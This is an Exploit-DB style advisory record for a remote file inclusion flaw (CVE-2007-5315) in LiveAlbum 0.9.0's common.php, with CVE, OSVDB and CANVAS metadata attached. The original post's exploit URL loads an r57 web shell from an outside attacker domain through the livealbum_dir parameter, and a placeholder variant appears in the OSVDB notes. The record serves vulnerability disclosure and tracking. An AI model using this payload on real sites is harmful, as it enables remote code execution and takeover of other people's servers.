ID EDB-ID:4503
Type exploitdb
Reporter S.W.A.T.
Modified 2007-10-08T00:00:00
Description
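LiveAlbum 0.9.0 common.php Remote File Inclusion Vulnerability (CVE-2007-5315). Webapps exploit for the PHP platform. Per the CVE and OSVDB records further down this page, the issue is present only when PHP's register_globals option is enabled, which has not been the default setting since PHP 4.2.0.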
\\\|///
\\ - - // Xmors Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : LiveAlbum 0.9.0
Download : http://downloads.sourceforge.net/livealbum/livealbum-0.9.1.tar.bz2
Author : S.W.A.T.
HomePage : wWw.XmorS.CoM
Type : Remote File Inclusion
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
+---------------------------------------------------------------------------------------------+
Vuln :
http://[TARGET]/[PATH]/common.php?livealbum_dir=http://xmors.by.ry/r57.php?
+---------------------------------------------------------------------------------------------+
# milw0rm.com [2007-10-08]
{"id": "EDB-ID:4503", "type": "exploitdb", "bulletinFamily": "exploit", "title": "LiveAlbum 0.9.0 common.php Remote File Inclusion Vulnerability", "description": "LiveAlbum 0.9.0 common.php Remote File Inclusion Vulnerability. CVE-2007-5315. Webapps exploit for php platform", "published": "2007-10-08T00:00:00", "modified": "2007-10-08T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4503/", "reporter": "S.W.A.T.", "references": [], "cvelist": ["CVE-2007-5315"], "lastseen": "2016-01-31T21:04:57", "viewCount": 5, "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2016-01-31T21:04:57", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-5315"]}, {"type": "canvas", "idList": ["LIVEALBUM_INCLUDE"]}, {"type": "osvdb", "idList": ["OSVDB:37618"]}], "modified": "2016-01-31T21:04:57", "rev": 2}, "vulnersScore": 7.7}, "sourceHref": "https://www.exploit-db.com/download/4503/", "sourceData": " \\\\\\|///\n \\\\ - - // Xmors Underground Group\n ( @ @ )\n ----oOOo--(_)-oOOo--------------------------------------------------\n Portal : LiveAlbum 0.9.0\n Download : http://downloads.sourceforge.net/livealbum/livealbum-0.9.1.tar.bz2\n\t Author : S.W.A.T.\n\t HomePage : wWw.XmorS.CoM\n\t Type : Remote File Inclusion\n ----ooooO-----Ooooo--------------------------------------------------\n ( ) ( )\n \\ ( ) /\n \\_) (_/\n\n\n\n+---------------------------------------------------------------------------------------------+\n\nVuln :\n\nhttp://[TARGET]/[PATH]/common.php?livealbum_dir=http://xmors.by.ry/r57.php?\n\n\n+---------------------------------------------------------------------------------------------+\n\n# milw0rm.com [2007-10-08]\n", "osvdbidlist": ["37618"]}
{"cve": [{"lastseen": "2020-10-03T11:45:54", "description": "PHP remote file inclusion vulnerability in common.php in LiveAlbum 0.9.0, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the livealbum_dir parameter.", "edition": 3, "cvss3": {}, "published": "2007-10-09T21:17:00", "title": "CVE-2007-5315", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-5315"], "modified": "2017-09-29T01:29:00", "cpe": ["cpe:/a:softpedia:livealbum:0.9.0"], "id": "CVE-2007-5315", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5315", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:softpedia:livealbum:0.9.0:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-5315"], "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. 
This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Manual Testing Notes\nhttp://[TARGET]/[PATH]/common.php?livealbum_dir=http://[attacker]/r57.php?\n## References:\n[Secunia Advisory ID:27139](https://secuniaresearch.flexerasoftware.com/advisories/27139/)\nOther Advisory URL: http://milw0rm.com/exploits/4503\nISS X-Force ID: 37028\nFrSIRT Advisory: ADV-2007-3446\n[CVE-2007-5315](https://vulners.com/cve/CVE-2007-5315)\n", "edition": 1, "modified": "2007-10-08T00:00:00", "published": "2007-10-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:37618", "id": "OSVDB:37618", "title": "LiveAlbum common.php livealbum_dir Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "canvas": [{"lastseen": "2019-05-29T17:19:27", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5315"], "description": "**Name**| livealbum_include \n---|--- \n**CVE**| CVE-2007-5315 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| LiveAlbum remote file include \n**Notes**| CVSS: 6.8 \nRepeatability: Infinite \nVENDOR: LiveAlbum \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5315 \nCVE Name: CVE-2007-5315 \n\n", "edition": 2, "modified": "2007-10-09T21:17:00", "published": "2007-10-09T21:17:00", "id": "LIVEALBUM_INCLUDE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/livealbum_include", "type": "canvas", "title": "Immunity Canvas: LIVEALBUM_INCLUDE", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}